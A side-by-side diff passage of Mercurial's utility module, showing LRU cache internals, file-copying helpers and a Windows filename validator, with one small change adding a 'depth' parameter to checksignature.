1490 def __setitem__(self, k, v):
1490 def __setitem__(self, k, v):
1491 self.insert(k, v)
1491 self.insert(k, v)
1492
1492
1493 def __delitem__(self, k):
1493 def __delitem__(self, k):
1494 self.pop(k)
1494 self.pop(k)
1495
1495
1496 def pop(self, k, default=_notset):
1496 def pop(self, k, default=_notset):
1497 try:
1497 try:
1498 node = self._cache.pop(k)
1498 node = self._cache.pop(k)
1499 except KeyError:
1499 except KeyError:
1500 if default is _notset:
1500 if default is _notset:
1501 raise
1501 raise
1502 return default
1502 return default
1503
1503
1504 assert node is not None # help pytype
1504 assert node is not None # help pytype
1505 value = node.value
1505 value = node.value
1506 self.totalcost -= node.cost
1506 self.totalcost -= node.cost
1507 node.markempty()
1507 node.markempty()
1508
1508
1509 # Temporarily mark as newest item before re-adjusting head to make
1509 # Temporarily mark as newest item before re-adjusting head to make
1510 # this node the oldest item.
1510 # this node the oldest item.
1511 self._movetohead(node)
1511 self._movetohead(node)
1512 self._head = node.next
1512 self._head = node.next
1513
1513
1514 return value
1514 return value
1515
1515
1516 # Additional dict methods.
1516 # Additional dict methods.
1517
1517
1518 def get(self, k, default=None):
1518 def get(self, k, default=None):
1519 try:
1519 try:
1520 return self.__getitem__(k)
1520 return self.__getitem__(k)
1521 except KeyError:
1521 except KeyError:
1522 return default
1522 return default
1523
1523
1524 def peek(self, k, default=_notset):
1524 def peek(self, k, default=_notset):
1525 """Get the specified item without moving it to the head
1525 """Get the specified item without moving it to the head
1526
1526
1527 Unlike get(), this doesn't mutate the internal state. But be aware
1527 Unlike get(), this doesn't mutate the internal state. But be aware
1528 that it doesn't mean peek() is thread safe.
1528 that it doesn't mean peek() is thread safe.
1529 """
1529 """
1530 try:
1530 try:
1531 node = self._cache[k]
1531 node = self._cache[k]
1532 return node.value
1532 return node.value
1533 except KeyError:
1533 except KeyError:
1534 if default is _notset:
1534 if default is _notset:
1535 raise
1535 raise
1536 return default
1536 return default
1537
1537
1538 def clear(self):
1538 def clear(self):
1539 n = self._head
1539 n = self._head
1540 while n.key is not _notset:
1540 while n.key is not _notset:
1541 self.totalcost -= n.cost
1541 self.totalcost -= n.cost
1542 n.markempty()
1542 n.markempty()
1543 n = n.next
1543 n = n.next
1544
1544
1545 self._cache.clear()
1545 self._cache.clear()
1546
1546
1547 def copy(self, capacity=None, maxcost=0):
1547 def copy(self, capacity=None, maxcost=0):
1548 """Create a new cache as a copy of the current one.
1548 """Create a new cache as a copy of the current one.
1549
1549
1550 By default, the new cache has the same capacity as the existing one.
1550 By default, the new cache has the same capacity as the existing one.
1551 But, the cache capacity can be changed as part of performing the
1551 But, the cache capacity can be changed as part of performing the
1552 copy.
1552 copy.
1553
1553
1554 Items in the copy have an insertion/access order matching this
1554 Items in the copy have an insertion/access order matching this
1555 instance.
1555 instance.
1556 """
1556 """
1557
1557
1558 capacity = capacity or self.capacity
1558 capacity = capacity or self.capacity
1559 maxcost = maxcost or self.maxcost
1559 maxcost = maxcost or self.maxcost
1560 result = lrucachedict(capacity, maxcost=maxcost)
1560 result = lrucachedict(capacity, maxcost=maxcost)
1561
1561
1562 # We copy entries by iterating in oldest-to-newest order so the copy
1562 # We copy entries by iterating in oldest-to-newest order so the copy
1563 # has the correct ordering.
1563 # has the correct ordering.
1564
1564
1565 # Find the first non-empty entry.
1565 # Find the first non-empty entry.
1566 n = self._head.prev
1566 n = self._head.prev
1567 while n.key is _notset and n is not self._head:
1567 while n.key is _notset and n is not self._head:
1568 n = n.prev
1568 n = n.prev
1569
1569
1570 # We could potentially skip the first N items when decreasing capacity.
1570 # We could potentially skip the first N items when decreasing capacity.
1571 # But let's keep it simple unless it is a performance problem.
1571 # But let's keep it simple unless it is a performance problem.
1572 for i in range(len(self._cache)):
1572 for i in range(len(self._cache)):
1573 result.insert(n.key, n.value, cost=n.cost)
1573 result.insert(n.key, n.value, cost=n.cost)
1574 n = n.prev
1574 n = n.prev
1575
1575
1576 return result
1576 return result
1577
1577
1578 def popoldest(self):
1578 def popoldest(self):
1579 """Remove the oldest item from the cache.
1579 """Remove the oldest item from the cache.
1580
1580
1581 Returns the (key, value) describing the removed cache entry.
1581 Returns the (key, value) describing the removed cache entry.
1582 """
1582 """
1583 if not self._cache:
1583 if not self._cache:
1584 return
1584 return
1585
1585
1586 # Walk the linked list backwards starting at tail node until we hit
1586 # Walk the linked list backwards starting at tail node until we hit
1587 # a non-empty node.
1587 # a non-empty node.
1588 n = self._head.prev
1588 n = self._head.prev
1589 while n.key is _notset:
1589 while n.key is _notset:
1590 n = n.prev
1590 n = n.prev
1591
1591
1592 assert n is not None # help pytype
1592 assert n is not None # help pytype
1593
1593
1594 key, value = n.key, n.value
1594 key, value = n.key, n.value
1595
1595
1596 # And remove it from the cache and mark it as empty.
1596 # And remove it from the cache and mark it as empty.
1597 del self._cache[n.key]
1597 del self._cache[n.key]
1598 self.totalcost -= n.cost
1598 self.totalcost -= n.cost
1599 n.markempty()
1599 n.markempty()
1600
1600
1601 return key, value
1601 return key, value
1602
1602
1603 def _movetohead(self, node):
1603 def _movetohead(self, node):
1604 """Mark a node as the newest, making it the new head.
1604 """Mark a node as the newest, making it the new head.
1605
1605
1606 When a node is accessed, it becomes the freshest entry in the LRU
1606 When a node is accessed, it becomes the freshest entry in the LRU
1607 list, which is denoted by self._head.
1607 list, which is denoted by self._head.
1608
1608
1609 Visually, let's make ``N`` the new head node (* denotes head):
1609 Visually, let's make ``N`` the new head node (* denotes head):
1610
1610
1611 previous/oldest <-> head <-> next/next newest
1611 previous/oldest <-> head <-> next/next newest
1612
1612
1613 ----<->--- A* ---<->-----
1613 ----<->--- A* ---<->-----
1614 | |
1614 | |
1615 E <-> D <-> N <-> C <-> B
1615 E <-> D <-> N <-> C <-> B
1616
1616
1617 To:
1617 To:
1618
1618
1619 ----<->--- N* ---<->-----
1619 ----<->--- N* ---<->-----
1620 | |
1620 | |
1621 E <-> D <-> C <-> B <-> A
1621 E <-> D <-> C <-> B <-> A
1622
1622
1623 This requires the following moves:
1623 This requires the following moves:
1624
1624
1625 C.next = D (node.prev.next = node.next)
1625 C.next = D (node.prev.next = node.next)
1626 D.prev = C (node.next.prev = node.prev)
1626 D.prev = C (node.next.prev = node.prev)
1627 E.next = N (head.prev.next = node)
1627 E.next = N (head.prev.next = node)
1628 N.prev = E (node.prev = head.prev)
1628 N.prev = E (node.prev = head.prev)
1629 N.next = A (node.next = head)
1629 N.next = A (node.next = head)
1630 A.prev = N (head.prev = node)
1630 A.prev = N (head.prev = node)
1631 """
1631 """
1632 head = self._head
1632 head = self._head
1633 # C.next = D
1633 # C.next = D
1634 node.prev.next = node.next
1634 node.prev.next = node.next
1635 # D.prev = C
1635 # D.prev = C
1636 node.next.prev = node.prev
1636 node.next.prev = node.prev
1637 # N.prev = E
1637 # N.prev = E
1638 node.prev = head.prev
1638 node.prev = head.prev
1639 # N.next = A
1639 # N.next = A
1640 # It is tempting to do just "head" here, however if node is
1640 # It is tempting to do just "head" here, however if node is
1641 # adjacent to head, this will do bad things.
1641 # adjacent to head, this will do bad things.
1642 node.next = head.prev.next
1642 node.next = head.prev.next
1643 # E.next = N
1643 # E.next = N
1644 node.next.prev = node
1644 node.next.prev = node
1645 # A.prev = N
1645 # A.prev = N
1646 node.prev.next = node
1646 node.prev.next = node
1647
1647
1648 self._head = node
1648 self._head = node
1649
1649
1650 def _addcapacity(self):
1650 def _addcapacity(self):
1651 """Add a node to the circular linked list.
1651 """Add a node to the circular linked list.
1652
1652
1653 The new node is inserted before the head node.
1653 The new node is inserted before the head node.
1654 """
1654 """
1655 head = self._head
1655 head = self._head
1656 node = _lrucachenode()
1656 node = _lrucachenode()
1657 head.prev.next = node
1657 head.prev.next = node
1658 node.prev = head.prev
1658 node.prev = head.prev
1659 node.next = head
1659 node.next = head
1660 head.prev = node
1660 head.prev = node
1661 self._size += 1
1661 self._size += 1
1662 return node
1662 return node
1663
1663
1664 def _enforcecostlimit(self):
1664 def _enforcecostlimit(self):
1665 # This should run after an insertion. It should only be called if total
1665 # This should run after an insertion. It should only be called if total
1666 # cost limits are being enforced.
1666 # cost limits are being enforced.
1667 # The most recently inserted node is never evicted.
1667 # The most recently inserted node is never evicted.
1668 if len(self) <= 1 or self.totalcost <= self.maxcost:
1668 if len(self) <= 1 or self.totalcost <= self.maxcost:
1669 return
1669 return
1670
1670
1671 # This is logically equivalent to calling popoldest() until we
1671 # This is logically equivalent to calling popoldest() until we
1672 # free up enough cost. We don't do that since popoldest() needs
1672 # free up enough cost. We don't do that since popoldest() needs
1673 # to walk the linked list and doing this in a loop would be
1673 # to walk the linked list and doing this in a loop would be
1674 # quadratic. So we find the first non-empty node and then
1674 # quadratic. So we find the first non-empty node and then
1675 # walk nodes until we free up enough capacity.
1675 # walk nodes until we free up enough capacity.
1676 #
1676 #
1677 # If we only removed the minimum number of nodes to free enough
1677 # If we only removed the minimum number of nodes to free enough
1678 # cost at insert time, chances are high that the next insert would
1678 # cost at insert time, chances are high that the next insert would
1679 # also require pruning. This would effectively constitute quadratic
1679 # also require pruning. This would effectively constitute quadratic
1680 # behavior for insert-heavy workloads. To mitigate this, we set a
1680 # behavior for insert-heavy workloads. To mitigate this, we set a
1681 # target cost that is a percentage of the max cost. This will tend
1681 # target cost that is a percentage of the max cost. This will tend
1682 # to free more nodes when the high water mark is reached, which
1682 # to free more nodes when the high water mark is reached, which
1683 # lowers the chances of needing to prune on the subsequent insert.
1683 # lowers the chances of needing to prune on the subsequent insert.
1684 targetcost = int(self.maxcost * 0.75)
1684 targetcost = int(self.maxcost * 0.75)
1685
1685
1686 n = self._head.prev
1686 n = self._head.prev
1687 while n.key is _notset:
1687 while n.key is _notset:
1688 n = n.prev
1688 n = n.prev
1689
1689
1690 while len(self) > 1 and self.totalcost > targetcost:
1690 while len(self) > 1 and self.totalcost > targetcost:
1691 del self._cache[n.key]
1691 del self._cache[n.key]
1692 self.totalcost -= n.cost
1692 self.totalcost -= n.cost
1693 n.markempty()
1693 n.markempty()
1694 n = n.prev
1694 n = n.prev
1695
1695
1696
1696
1697 def lrucachefunc(func):
1697 def lrucachefunc(func):
1698 '''cache most recent results of function calls'''
1698 '''cache most recent results of function calls'''
1699 cache = {}
1699 cache = {}
1700 order = collections.deque()
1700 order = collections.deque()
1701 if func.__code__.co_argcount == 1:
1701 if func.__code__.co_argcount == 1:
1702
1702
1703 def f(arg):
1703 def f(arg):
1704 if arg not in cache:
1704 if arg not in cache:
1705 if len(cache) > 20:
1705 if len(cache) > 20:
1706 del cache[order.popleft()]
1706 del cache[order.popleft()]
1707 cache[arg] = func(arg)
1707 cache[arg] = func(arg)
1708 else:
1708 else:
1709 order.remove(arg)
1709 order.remove(arg)
1710 order.append(arg)
1710 order.append(arg)
1711 return cache[arg]
1711 return cache[arg]
1712
1712
1713 else:
1713 else:
1714
1714
1715 def f(*args):
1715 def f(*args):
1716 if args not in cache:
1716 if args not in cache:
1717 if len(cache) > 20:
1717 if len(cache) > 20:
1718 del cache[order.popleft()]
1718 del cache[order.popleft()]
1719 cache[args] = func(*args)
1719 cache[args] = func(*args)
1720 else:
1720 else:
1721 order.remove(args)
1721 order.remove(args)
1722 order.append(args)
1722 order.append(args)
1723 return cache[args]
1723 return cache[args]
1724
1724
1725 return f
1725 return f
1726
1726
1727
1727
1728 class propertycache(object):
1728 class propertycache(object):
1729 def __init__(self, func):
1729 def __init__(self, func):
1730 self.func = func
1730 self.func = func
1731 self.name = func.__name__
1731 self.name = func.__name__
1732
1732
1733 def __get__(self, obj, type=None):
1733 def __get__(self, obj, type=None):
1734 result = self.func(obj)
1734 result = self.func(obj)
1735 self.cachevalue(obj, result)
1735 self.cachevalue(obj, result)
1736 return result
1736 return result
1737
1737
1738 def cachevalue(self, obj, value):
1738 def cachevalue(self, obj, value):
1739 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1739 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1740 obj.__dict__[self.name] = value
1740 obj.__dict__[self.name] = value
1741
1741
1742
1742
1743 def clearcachedproperty(obj, prop):
1743 def clearcachedproperty(obj, prop):
1744 '''clear a cached property value, if one has been set'''
1744 '''clear a cached property value, if one has been set'''
1745 prop = pycompat.sysstr(prop)
1745 prop = pycompat.sysstr(prop)
1746 if prop in obj.__dict__:
1746 if prop in obj.__dict__:
1747 del obj.__dict__[prop]
1747 del obj.__dict__[prop]
1748
1748
1749
1749
1750 def increasingchunks(source, min=1024, max=65536):
1750 def increasingchunks(source, min=1024, max=65536):
1751 '''return no less than min bytes per chunk while data remains,
1751 '''return no less than min bytes per chunk while data remains,
1752 doubling min after each chunk until it reaches max'''
1752 doubling min after each chunk until it reaches max'''
1753
1753
1754 def log2(x):
1754 def log2(x):
1755 if not x:
1755 if not x:
1756 return 0
1756 return 0
1757 i = 0
1757 i = 0
1758 while x:
1758 while x:
1759 x >>= 1
1759 x >>= 1
1760 i += 1
1760 i += 1
1761 return i - 1
1761 return i - 1
1762
1762
1763 buf = []
1763 buf = []
1764 blen = 0
1764 blen = 0
1765 for chunk in source:
1765 for chunk in source:
1766 buf.append(chunk)
1766 buf.append(chunk)
1767 blen += len(chunk)
1767 blen += len(chunk)
1768 if blen >= min:
1768 if blen >= min:
1769 if min < max:
1769 if min < max:
1770 min = min << 1
1770 min = min << 1
1771 nmin = 1 << log2(blen)
1771 nmin = 1 << log2(blen)
1772 if nmin > min:
1772 if nmin > min:
1773 min = nmin
1773 min = nmin
1774 if min > max:
1774 if min > max:
1775 min = max
1775 min = max
1776 yield b''.join(buf)
1776 yield b''.join(buf)
1777 blen = 0
1777 blen = 0
1778 buf = []
1778 buf = []
1779 if buf:
1779 if buf:
1780 yield b''.join(buf)
1780 yield b''.join(buf)
1781
1781
1782
1782
1783 def always(fn):
1783 def always(fn):
1784 return True
1784 return True
1785
1785
1786
1786
1787 def never(fn):
1787 def never(fn):
1788 return False
1788 return False
1789
1789
1790
1790
1791 def nogc(func):
1791 def nogc(func):
1792 """disable garbage collector
1792 """disable garbage collector
1793
1793
1794 Python's garbage collector triggers a GC each time a certain number of
1794 Python's garbage collector triggers a GC each time a certain number of
1795 container objects (the number being defined by gc.get_threshold()) are
1795 container objects (the number being defined by gc.get_threshold()) are
1796 allocated even when marked not to be tracked by the collector. Tracking has
1796 allocated even when marked not to be tracked by the collector. Tracking has
1797 no effect on when GCs are triggered, only on what objects the GC looks
1797 no effect on when GCs are triggered, only on what objects the GC looks
1798 into. As a workaround, disable GC while building complex (huge)
1798 into. As a workaround, disable GC while building complex (huge)
1799 containers.
1799 containers.
1800
1800
1801 This garbage collector issue have been fixed in 2.7. But it still affect
1801 This garbage collector issue have been fixed in 2.7. But it still affect
1802 CPython's performance.
1802 CPython's performance.
1803 """
1803 """
1804
1804
1805 def wrapper(*args, **kwargs):
1805 def wrapper(*args, **kwargs):
1806 gcenabled = gc.isenabled()
1806 gcenabled = gc.isenabled()
1807 gc.disable()
1807 gc.disable()
1808 try:
1808 try:
1809 return func(*args, **kwargs)
1809 return func(*args, **kwargs)
1810 finally:
1810 finally:
1811 if gcenabled:
1811 if gcenabled:
1812 gc.enable()
1812 gc.enable()
1813
1813
1814 return wrapper
1814 return wrapper
1815
1815
1816
1816
1817 if pycompat.ispypy:
1817 if pycompat.ispypy:
1818 # PyPy runs slower with gc disabled
1818 # PyPy runs slower with gc disabled
1819 nogc = lambda x: x
1819 nogc = lambda x: x
1820
1820
1821
1821
1822 def pathto(root, n1, n2):
1822 def pathto(root, n1, n2):
1823 '''return the relative path from one place to another.
1823 '''return the relative path from one place to another.
1824 root should use os.sep to separate directories
1824 root should use os.sep to separate directories
1825 n1 should use os.sep to separate directories
1825 n1 should use os.sep to separate directories
1826 n2 should use "/" to separate directories
1826 n2 should use "/" to separate directories
1827 returns an os.sep-separated path.
1827 returns an os.sep-separated path.
1828
1828
1829 If n1 is a relative path, it's assumed it's
1829 If n1 is a relative path, it's assumed it's
1830 relative to root.
1830 relative to root.
1831 n2 should always be relative to root.
1831 n2 should always be relative to root.
1832 '''
1832 '''
1833 if not n1:
1833 if not n1:
1834 return localpath(n2)
1834 return localpath(n2)
1835 if os.path.isabs(n1):
1835 if os.path.isabs(n1):
1836 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1836 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1837 return os.path.join(root, localpath(n2))
1837 return os.path.join(root, localpath(n2))
1838 n2 = b'/'.join((pconvert(root), n2))
1838 n2 = b'/'.join((pconvert(root), n2))
1839 a, b = splitpath(n1), n2.split(b'/')
1839 a, b = splitpath(n1), n2.split(b'/')
1840 a.reverse()
1840 a.reverse()
1841 b.reverse()
1841 b.reverse()
1842 while a and b and a[-1] == b[-1]:
1842 while a and b and a[-1] == b[-1]:
1843 a.pop()
1843 a.pop()
1844 b.pop()
1844 b.pop()
1845 b.reverse()
1845 b.reverse()
1846 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1846 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1847
1847
1848
1848
1849 def checksignature(func):
1849 def checksignature(func, depth=1):
1850 '''wrap a function with code to check for calling errors'''
1850 '''wrap a function with code to check for calling errors'''
1851
1851
1852 def check(*args, **kwargs):
1852 def check(*args, **kwargs):
1853 try:
1853 try:
1854 return func(*args, **kwargs)
1854 return func(*args, **kwargs)
1855 except TypeError:
1855 except TypeError:
1856 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1856 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1857 raise error.SignatureError
1857 raise error.SignatureError
1858 raise
1858 raise
1859
1859
1860 return check
1860 return check
1861
1861
1862
1862
1863 # a whilelist of known filesystems where hardlink works reliably
1863 # a whilelist of known filesystems where hardlink works reliably
1864 _hardlinkfswhitelist = {
1864 _hardlinkfswhitelist = {
1865 b'apfs',
1865 b'apfs',
1866 b'btrfs',
1866 b'btrfs',
1867 b'ext2',
1867 b'ext2',
1868 b'ext3',
1868 b'ext3',
1869 b'ext4',
1869 b'ext4',
1870 b'hfs',
1870 b'hfs',
1871 b'jfs',
1871 b'jfs',
1872 b'NTFS',
1872 b'NTFS',
1873 b'reiserfs',
1873 b'reiserfs',
1874 b'tmpfs',
1874 b'tmpfs',
1875 b'ufs',
1875 b'ufs',
1876 b'xfs',
1876 b'xfs',
1877 b'zfs',
1877 b'zfs',
1878 }
1878 }
1879
1879
1880
1880
1881 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1881 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1882 '''copy a file, preserving mode and optionally other stat info like
1882 '''copy a file, preserving mode and optionally other stat info like
1883 atime/mtime
1883 atime/mtime
1884
1884
1885 checkambig argument is used with filestat, and is useful only if
1885 checkambig argument is used with filestat, and is useful only if
1886 destination file is guarded by any lock (e.g. repo.lock or
1886 destination file is guarded by any lock (e.g. repo.lock or
1887 repo.wlock).
1887 repo.wlock).
1888
1888
1889 copystat and checkambig should be exclusive.
1889 copystat and checkambig should be exclusive.
1890 '''
1890 '''
1891 assert not (copystat and checkambig)
1891 assert not (copystat and checkambig)
1892 oldstat = None
1892 oldstat = None
1893 if os.path.lexists(dest):
1893 if os.path.lexists(dest):
1894 if checkambig:
1894 if checkambig:
1895 oldstat = checkambig and filestat.frompath(dest)
1895 oldstat = checkambig and filestat.frompath(dest)
1896 unlink(dest)
1896 unlink(dest)
1897 if hardlink:
1897 if hardlink:
1898 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1898 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1899 # unless we are confident that dest is on a whitelisted filesystem.
1899 # unless we are confident that dest is on a whitelisted filesystem.
1900 try:
1900 try:
1901 fstype = getfstype(os.path.dirname(dest))
1901 fstype = getfstype(os.path.dirname(dest))
1902 except OSError:
1902 except OSError:
1903 fstype = None
1903 fstype = None
1904 if fstype not in _hardlinkfswhitelist:
1904 if fstype not in _hardlinkfswhitelist:
1905 hardlink = False
1905 hardlink = False
1906 if hardlink:
1906 if hardlink:
1907 try:
1907 try:
1908 oslink(src, dest)
1908 oslink(src, dest)
1909 return
1909 return
1910 except (IOError, OSError):
1910 except (IOError, OSError):
1911 pass # fall back to normal copy
1911 pass # fall back to normal copy
1912 if os.path.islink(src):
1912 if os.path.islink(src):
1913 os.symlink(os.readlink(src), dest)
1913 os.symlink(os.readlink(src), dest)
1914 # copytime is ignored for symlinks, but in general copytime isn't needed
1914 # copytime is ignored for symlinks, but in general copytime isn't needed
1915 # for them anyway
1915 # for them anyway
1916 else:
1916 else:
1917 try:
1917 try:
1918 shutil.copyfile(src, dest)
1918 shutil.copyfile(src, dest)
1919 if copystat:
1919 if copystat:
1920 # copystat also copies mode
1920 # copystat also copies mode
1921 shutil.copystat(src, dest)
1921 shutil.copystat(src, dest)
1922 else:
1922 else:
1923 shutil.copymode(src, dest)
1923 shutil.copymode(src, dest)
1924 if oldstat and oldstat.stat:
1924 if oldstat and oldstat.stat:
1925 newstat = filestat.frompath(dest)
1925 newstat = filestat.frompath(dest)
1926 if newstat.isambig(oldstat):
1926 if newstat.isambig(oldstat):
1927 # stat of copied file is ambiguous to original one
1927 # stat of copied file is ambiguous to original one
1928 advanced = (
1928 advanced = (
1929 oldstat.stat[stat.ST_MTIME] + 1
1929 oldstat.stat[stat.ST_MTIME] + 1
1930 ) & 0x7FFFFFFF
1930 ) & 0x7FFFFFFF
1931 os.utime(dest, (advanced, advanced))
1931 os.utime(dest, (advanced, advanced))
1932 except shutil.Error as inst:
1932 except shutil.Error as inst:
1933 raise error.Abort(stringutil.forcebytestr(inst))
1933 raise error.Abort(stringutil.forcebytestr(inst))
1934
1934
1935
1935
1936 def copyfiles(src, dst, hardlink=None, progress=None):
1936 def copyfiles(src, dst, hardlink=None, progress=None):
1937 """Copy a directory tree using hardlinks if possible."""
1937 """Copy a directory tree using hardlinks if possible."""
1938 num = 0
1938 num = 0
1939
1939
1940 def settopic():
1940 def settopic():
1941 if progress:
1941 if progress:
1942 progress.topic = _(b'linking') if hardlink else _(b'copying')
1942 progress.topic = _(b'linking') if hardlink else _(b'copying')
1943
1943
1944 if os.path.isdir(src):
1944 if os.path.isdir(src):
1945 if hardlink is None:
1945 if hardlink is None:
1946 hardlink = (
1946 hardlink = (
1947 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1947 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1948 )
1948 )
1949 settopic()
1949 settopic()
1950 os.mkdir(dst)
1950 os.mkdir(dst)
1951 for name, kind in listdir(src):
1951 for name, kind in listdir(src):
1952 srcname = os.path.join(src, name)
1952 srcname = os.path.join(src, name)
1953 dstname = os.path.join(dst, name)
1953 dstname = os.path.join(dst, name)
1954 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1954 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1955 num += n
1955 num += n
1956 else:
1956 else:
1957 if hardlink is None:
1957 if hardlink is None:
1958 hardlink = (
1958 hardlink = (
1959 os.stat(os.path.dirname(src)).st_dev
1959 os.stat(os.path.dirname(src)).st_dev
1960 == os.stat(os.path.dirname(dst)).st_dev
1960 == os.stat(os.path.dirname(dst)).st_dev
1961 )
1961 )
1962 settopic()
1962 settopic()
1963
1963
1964 if hardlink:
1964 if hardlink:
1965 try:
1965 try:
1966 oslink(src, dst)
1966 oslink(src, dst)
1967 except (IOError, OSError):
1967 except (IOError, OSError):
1968 hardlink = False
1968 hardlink = False
1969 shutil.copy(src, dst)
1969 shutil.copy(src, dst)
1970 else:
1970 else:
1971 shutil.copy(src, dst)
1971 shutil.copy(src, dst)
1972 num += 1
1972 num += 1
1973 if progress:
1973 if progress:
1974 progress.increment()
1974 progress.increment()
1975
1975
1976 return hardlink, num
1976 return hardlink, num
1977
1977
1978
1978
1979 _winreservednames = {
1979 _winreservednames = {
1980 b'con',
1980 b'con',
1981 b'prn',
1981 b'prn',
1982 b'aux',
1982 b'aux',
1983 b'nul',
1983 b'nul',
1984 b'com1',
1984 b'com1',
1985 b'com2',
1985 b'com2',
1986 b'com3',
1986 b'com3',
1987 b'com4',
1987 b'com4',
1988 b'com5',
1988 b'com5',
1989 b'com6',
1989 b'com6',
1990 b'com7',
1990 b'com7',
1991 b'com8',
1991 b'com8',
1992 b'com9',
1992 b'com9',
1993 b'lpt1',
1993 b'lpt1',
1994 b'lpt2',
1994 b'lpt2',
1995 b'lpt3',
1995 b'lpt3',
1996 b'lpt4',
1996 b'lpt4',
1997 b'lpt5',
1997 b'lpt5',
1998 b'lpt6',
1998 b'lpt6',
1999 b'lpt7',
1999 b'lpt7',
2000 b'lpt8',
2000 b'lpt8',
2001 b'lpt9',
2001 b'lpt9',
2002 }
2002 }
2003 _winreservedchars = b':*?"<>|'
2003 _winreservedchars = b':*?"<>|'
2004
2004
2005
2005
2006 def checkwinfilename(path):
2006 def checkwinfilename(path):
2007 r'''Check that the base-relative path is a valid filename on Windows.
2007 r'''Check that the base-relative path is a valid filename on Windows.
2008 Returns None if the path is ok, or a UI string describing the problem.
2008 Returns None if the path is ok, or a UI string describing the problem.
2009
2009
2010 >>> checkwinfilename(b"just/a/normal/path")
2010 >>> checkwinfilename(b"just/a/normal/path")
2011 >>> checkwinfilename(b"foo/bar/con.xml")
2011 >>> checkwinfilename(b"foo/bar/con.xml")
2012 "filename contains 'con', which is reserved on Windows"
2012 "filename contains 'con', which is reserved on Windows"
2013 >>> checkwinfilename(b"foo/con.xml/bar")
2013 >>> checkwinfilename(b"foo/con.xml/bar")
2014 "filename contains 'con', which is reserved on Windows"
2014 "filename contains 'con', which is reserved on Windows"
2015 >>> checkwinfilename(b"foo/bar/xml.con")
2015 >>> checkwinfilename(b"foo/bar/xml.con")
2016 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2016 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2017 "filename contains 'AUX', which is reserved on Windows"
2017 "filename contains 'AUX', which is reserved on Windows"
2018 >>> checkwinfilename(b"foo/bar/bla:.txt")
2018 >>> checkwinfilename(b"foo/bar/bla:.txt")
2019 "filename contains ':', which is reserved on Windows"
2019 "filename contains ':', which is reserved on Windows"
2020 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2020 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2021 "filename contains '\\x07', which is invalid on Windows"
2021 "filename contains '\\x07', which is invalid on Windows"
2022 >>> checkwinfilename(b"foo/bar/bla ")
2022 >>> checkwinfilename(b"foo/bar/bla ")
2023 "filename ends with ' ', which is not allowed on Windows"
2023 "filename ends with ' ', which is not allowed on Windows"
2024 >>> checkwinfilename(b"../bar")
2024 >>> checkwinfilename(b"../bar")
2025 >>> checkwinfilename(b"foo\\")
2025 >>> checkwinfilename(b"foo\\")
2026 "filename ends with '\\', which is invalid on Windows"
2026 "filename ends with '\\', which is invalid on Windows"
2027 >>> checkwinfilename(b"foo\\/bar")
2027 >>> checkwinfilename(b"foo\\/bar")
2028 "directory name ends with '\\', which is invalid on Windows"
2028 "directory name ends with '\\', which is invalid on Windows"
2029 '''
2029 '''
2030 if path.endswith(b'\\'):
2030 if path.endswith(b'\\'):
2031 return _(b"filename ends with '\\', which is invalid on Windows")
2031 return _(b"filename ends with '\\', which is invalid on Windows")
2032 if b'\\/' in path:
2032 if b'\\/' in path:
2033 return _(b"directory name ends with '\\', which is invalid on Windows")
2033 return _(b"directory name ends with '\\', which is invalid on Windows")
2034 for n in path.replace(b'\\', b'/').split(b'/'):
2034 for n in path.replace(b'\\', b'/').split(b'/'):
2035 if not n:
2035 if not n:
2036 continue
2036 continue
2037 for c in _filenamebytestr(n):
2037 for c in _filenamebytestr(n):
2038 if c in _winreservedchars:
2038 if c in _winreservedchars:
2039 return (
2039 return (
2040 _(
2040 _(
2041 b"filename contains '%s', which is reserved "
2041 b"filename contains '%s', which is reserved "
2042 b"on Windows"
2042 b"on Windows"
2043 )
2043 )
2044 % c
2044 % c
2045 )
2045 )
2046 if ord(c) <= 31:
2046 if ord(c) <= 31:
2047 return _(
2047 return _(
2048 b"filename contains '%s', which is invalid on Windows"
2048 b"filename contains '%s', which is invalid on Windows"
2049 ) % stringutil.escapestr(c)
2049 ) % stringutil.escapestr(c)
2050 base = n.split(b'.')[0]
2050 base = n.split(b'.')[0]
2051 if base and base.lower() in _winreservednames:
2051 if base and base.lower() in _winreservednames:
2052 return (
2052 return (
2053 _(b"filename contains '%s', which is reserved on Windows")
2053 _(b"filename contains '%s', which is reserved on Windows")
2054 % base
2054 % base
2055 )
2055 )
2056 t = n[-1:]
2056 t = n[-1:]
2057 if t in b'. ' and n not in b'..':
2057 if t in b'. ' and n not in b'..':
2058 return (
2058 return (
2059 _(
2059 _(
2060 b"filename ends with '%s', which is not allowed "
2060 b"filename ends with '%s', which is not allowed "
2061 b"on Windows"
2061 b"on Windows"
2062 )
2062 )
2063 % t
2063 % t
2064 )
2064 )
2065
2065
2066
2066
2067 timer = getattr(time, "perf_counter", None)
2067 timer = getattr(time, "perf_counter", None)
2068
2068
2069 if pycompat.iswindows:
2069 if pycompat.iswindows:
2070 checkosfilename = checkwinfilename
2070 checkosfilename = checkwinfilename
2071 if not timer:
2071 if not timer:
2072 timer = time.clock
2072 timer = time.clock
2073 else:
2073 else:
2074 # mercurial.windows doesn't have platform.checkosfilename
2074 # mercurial.windows doesn't have platform.checkosfilename
2075 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2075 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2076 if not timer:
2076 if not timer:
2077 timer = time.time
2077 timer = time.time
2078
2078
2079
2079
2080 def makelock(info, pathname):
2080 def makelock(info, pathname):
